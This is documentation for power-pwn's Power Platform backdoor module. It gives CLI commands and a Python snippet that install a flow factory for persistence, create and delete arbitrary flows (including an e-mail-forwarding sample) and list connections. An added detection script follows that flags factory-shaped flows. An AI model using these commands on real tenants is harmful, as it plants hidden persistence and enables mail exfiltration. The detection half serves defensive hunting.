Modules: Install a backdoor
Maintain persistence on Power Platform by installing an automation factory that creates, executes and deletes arbitrary commands.
This capability was first presented at a DEFCON30 talk titled Low Code High Risk - Enterprise Domination via Low Code Abuse:
Inspired by a 2020 APT-related incident reported by Microsoft DART:
Threat actors create rules in the company's IT environment to automate data exfiltration to a third-party cloud storage solution.
For more info about the incident:
Install the backdoor flow factory (a flow that drives an existing Flow Management connector connection in the target environment) by running:
powerpwn backdoor -e {environment-id} install-factory -c {flow management connector connection id} -t {tenant}
Run powerpwn --help to get all available commands.
To create a flow, run
powerpwn backdoor -e {environment-id} create-flow -webhook-url {url to installed factory} -i {full path to input}
An example input file is provided in samples/sample_backdoor_flow_cli_input.json.
To delete a flow, run
powerpwn backdoor -e {environment-id} delete-flow -webhook-url {url to installed factory} -f {flow-id}

To get all connections, run
powerpwn backdoor -e {environment-id} get-connections -webhook-url {url to installed factory} -o {output file}
From Python, the same factory can be driven directly through the BackdoorFlow class:

from powerpwn.powerdoor.backdoor_flow import BackdoorFlow
from powerpwn.powerdoor.samples.forward_email_backdoor_flow import SAMPLE_FLOW

# URL of the installed factory's HTTP trigger, the same value the CLI takes as -webhook-url
POST_URL = ""

factory = BackdoorFlow(post_url=POST_URL)

# Ask the factory to create a flow from the bundled e-mail forwarding sample.
# All five fields come from the same sample object; create_flow returns the created flow.
flow = factory.create_flow(
    environment_id=SAMPLE_FLOW["environment"],
    flow_display_name=SAMPLE_FLOW["flowDisplayName"],
    flow_definition=SAMPLE_FLOW["flowDefinition"],
    flow_state=SAMPLE_FLOW["flowState"],
    connection_references=SAMPLE_FLOW["connectionReferences"],
)

# Remove it again; the flow's "name" field is its id
factory.delete_flow(environment_id=SAMPLE_FLOW["environment"], flow_id=flow["name"])
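The CLI procedure and the Python snippet above both feed the factory a flow input with five fields (environment, display name, definition, state, connection references). The following is an added example, written for this page and not code from power-pwn or from the original README: it builds a constructed input in that shape as a factory itself would look (an HTTP Request trigger routing to Flow Management connector actions), then runs a defender's check that flags any flow with that shape, walking nested Switch, Condition and Scope bodies so the connector actions cannot hide one level down. The Flow Management API id, the operation ids, the factory's internal layout and the input-file key names are assumptions modelled on the public workflow-definition format and on the create_flow parameters shown above; they are not taken from power-pwn's source.

```python
import json

# Assumption: the Flow Management connector's API id as it appears in definitions and
# connection references. Operation ids below (CreateFlow, DeleteFlow, ListConnections) are illustrative.
FLOW_MANAGEMENT_API = "/providers/Microsoft.PowerApps/apis/shared_flowmanagement"

# The fields BackdoorFlow.create_flow takes; assumed to be the CLI input file's keys as well.
REQUIRED_KEYS = ("environment", "flowDisplayName", "flowDefinition", "flowState", "connectionReferences")


def fm_action(operation_id):
    """One Flow Management connector action in workflow-definition shape (constructed)."""
    return {"type": "OpenApiConnection",
            "inputs": {"host": {"apiId": FLOW_MANAGEMENT_API,
                                "connectionName": "shared_flowmanagement",
                                "operationId": operation_id},
                       "parameters": {}}}


# Constructed sample: a factory-shaped flow. The HTTP trigger receives a JSON body and a Switch
# on its "action" field routes to Flow Management actions. All ids are placeholders.
FACTORY_INPUT = {
    "environment": "Default-00000000-0000-0000-0000-000000000000",
    "flowDisplayName": "Sync Status",
    "flowState": "Started",
    "connectionReferences": {"shared_flowmanagement": {"connectionName": "placeholder-connection-id",
                                                       "id": FLOW_MANAGEMENT_API}},
    "flowDefinition": {
        "triggers": {"manual": {"type": "Request", "kind": "Http", "inputs": {"schema": {"type": "object"}}}},
        "actions": {
            "Route": {"type": "Switch", "expression": "@triggerBody()?['action']",
                      "cases": {"Create": {"case": "create", "actions": {"Create_Flow": fm_action("CreateFlow")}},
                                "Delete": {"case": "delete", "actions": {"Delete_Flow": fm_action("DeleteFlow")}},
                                "Connections": {"case": "get_connections",
                                                "actions": {"List_Connections": fm_action("ListConnections")}}},
                      "default": {"actions": {}}},
            "Reply": {"type": "Response", "runAfter": {"Route": ["Succeeded"]}, "inputs": {"statusCode": 200}},
        },
    },
}

# Constructed benign flow for contrast: scheduled trigger that sends an e-mail.
BENIGN_INPUT = {
    "environment": FACTORY_INPUT["environment"],
    "flowDisplayName": "Daily digest",
    "flowState": "Started",
    "connectionReferences": {"shared_office365": {"connectionName": "placeholder",
                                                  "id": "/providers/Microsoft.PowerApps/apis/shared_office365"}},
    "flowDefinition": {
        "triggers": {"Recurrence": {"type": "Recurrence", "recurrence": {"frequency": "Day", "interval": 1}}},
        "actions": {"Send_mail": {"type": "OpenApiConnection",
                                  "inputs": {"host": {"apiId": "/providers/Microsoft.PowerApps/apis/shared_office365",
                                                      "operationId": "SendEmailV2"}}}},
    },
}


def load_input(text):
    """Parse a CLI-style input file and reject it if a required field is missing."""
    data = json.loads(text)
    missing = [k for k in REQUIRED_KEYS if k not in data]
    if missing:
        raise ValueError(f"input file missing keys: {missing}")
    return data


def walk(node):
    """Yield every dict nested anywhere under node (Switch cases, Scope and Condition bodies included)."""
    if isinstance(node, dict):
        yield node
        for value in node.values():
            yield from walk(value)
    elif isinstance(node, list):
        for value in node:
            yield from walk(value)


def connector_operations(definition):
    """(apiId, operationId) of every connector action in the definition, however deeply nested."""
    ops = []
    for d in walk(definition.get("actions", {})):
        if d.get("type") == "OpenApiConnection":
            host = d.get("inputs", {}).get("host", {})
            ops.append((host.get("apiId", ""), host.get("operationId", "")))
    return ops


def assess(flow_input):
    """Flag flows shaped like a factory: externally triggerable and able to create or delete other flows."""
    definition = flow_input["flowDefinition"]
    http_trigger = any(t.get("type") == "Request" for t in definition.get("triggers", {}).values())
    fm_ops = sorted({op for api, op in connector_operations(definition) if api.endswith("shared_flowmanagement")})
    references_fm = any(ref.get("id", "").endswith("shared_flowmanagement")
                        for ref in flow_input.get("connectionReferences", {}).values())
    manages_flows = bool({"CreateFlow", "DeleteFlow"} & set(fm_ops))
    findings = []
    if http_trigger:
        findings.append("http_request_trigger")
    if references_fm or fm_ops:
        findings.append("uses_flow_management_connector")
    if manages_flows:
        findings.append("creates_or_deletes_flows")
    return {"displayName": flow_input["flowDisplayName"], "flowManagementOperations": fm_ops,
            "findings": findings, "factoryLike": http_trigger and manages_flows}


if __name__ == "__main__":
    for sample in (FACTORY_INPUT, BENIGN_INPUT):
        print(json.dumps(assess(load_input(json.dumps(sample))), indent=2))
```

In a real hunt, each flow's definition and connection references would be pulled from the Power Automate management API and passed to assess(). Two caveats: a factory does not have to use the Flow Management connector (it can call the management REST API through a plain HTTP action with a stolen token), so connector matching is a strong but not exhaustive signal, and an HTTP Request trigger alone is common in legitimate integrations; the combination with flow creation or deletion is what deserves a look.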